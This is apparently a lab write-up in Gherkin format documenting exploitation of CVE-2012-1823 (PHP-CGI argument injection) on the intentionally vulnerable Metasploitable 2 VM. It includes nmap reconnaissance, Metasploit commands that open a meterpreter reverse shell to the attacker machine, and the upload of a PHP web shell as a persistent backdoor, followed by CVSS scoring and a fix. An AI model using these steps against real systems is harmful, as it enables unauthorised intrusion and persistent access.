## Version 1.4.0
## language: en

Feature:
  TOE:
    Metasploitable 2
  Page name:
    Metasploitable 2
  CWE:
    CWE-88: Argument Injection or Modification
  Goal:
    Gain access to the host machine of a website as user
  Recommendation:
    Update PHP version, don't send x-powered-by headers

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Kali Linux      | 2017.1      |
    | Firefox ESR     | 45.8.0      |
    | Metasploit      | 4.14.13     |
  TOE information:
    Given I am accessing the site """http://mutillidae/index.php"""
    And enter a php site that allows me to go to different pages with vulns
    And the server is running PHP version 5.2.4
    And Apache version 2.2.8
    And is running on Metasploitable 2 with kernel 2.6.24

  Scenario: Normal use case
  Accesing the website as normal
    Given I access """http://mutillidae/index.php"""
    Then I can see a webpage with links to other pages with different vulns
    And I can see it lists """PHP Version: 5.2.4-2ubuntu5.10""" in the footer

  Scenario: Dynamic detection
  Outdated PHP version
    Given I execute the following command in my machine:
    """
    nmap -sV --script=http-php-version 192.168.10.11
    """
    Then I get this output:
    """
    ...
    80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
    | http-php-version: Versions from logo query (less accurate): 5.1.3 - 5.1.6
    5.2.0 - 5.2.17
    | Versions from credits query (more accurate): 5.2.3 - 5.2.5, 5.2.6RC3
    |_Version from header x-powered-by: PHP/5.2.4-2ubuntu5.10
    |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
    ...
    """
    Then I conclude the machine uses PHP 5.2.4
    And after some research I find CVE-2012-1823, a CGI Argument Injection vuln
    And find a metasploit module to exploit it
    Then I conclude I can gain access to the machine

  Scenario: Exploitation
  Get a meterpreter session in the target machine
    Given target machine is running a PHP version vulnerable to CVE-2012-1823
    Then I execute the following commands in kali:
    """
    # msfconsole
    msf > use exploit/multi/http/php_cgi_arg_injection
    msf exploit(php_cgi_arg_injection) > set rhost 192.168.10.11
    msf exploit(php_cgi_arg_injection) > set payload php/meterpreter/reverse_tcp
    msf exploit(php_cgi_arg_injection) > exploit
    """
    Then I get the output:
    """
    [*] Started reverse TCP handler on 192.168.10.10:4444
    [*] Sending stage (33986 bytes) to 192.168.10.11
    [*] Meterpreter session 1 opened (192.168.10.10:4444 -> 192.168.10.11:49755)
     at 2018-11-03 17:41:34 -0400

    meterpreter >
    """
    Then I can run command on the machine
    And I run
    """
    meterpreter > getuid
    Server username: www-data (33)
    """
    Then I have successfully granted myself access as the user www-data

  Scenario: Maintaining access
  Leaving a PHP shell in the target machine for later access
    Given I have a shell session in the target machine
    Then I upload a simple PHP shell with
    """
    meterpreter > upload p0wny-shell/shell.php /var/www/shell.php
    [*] uploading  : p0wny-shell/shell.php -> shell.php
    [*] uploaded   : p0wny-shell/shell.php -> shell.php
    """
    Then in my machine I go to """http://192.168.10.11/shell.php"""
    And I see [evidence](shell.png)
    Then I have a backdoor into the target machine

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    9.4/10 (High) - AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.0/10 (High) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    7.1/10 (Medium) - CR:L/IR:L/AR:L/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:L/MI:H/MA:H

  Scenario: Correlations
    No correlations have been found to this date 2018-11-08
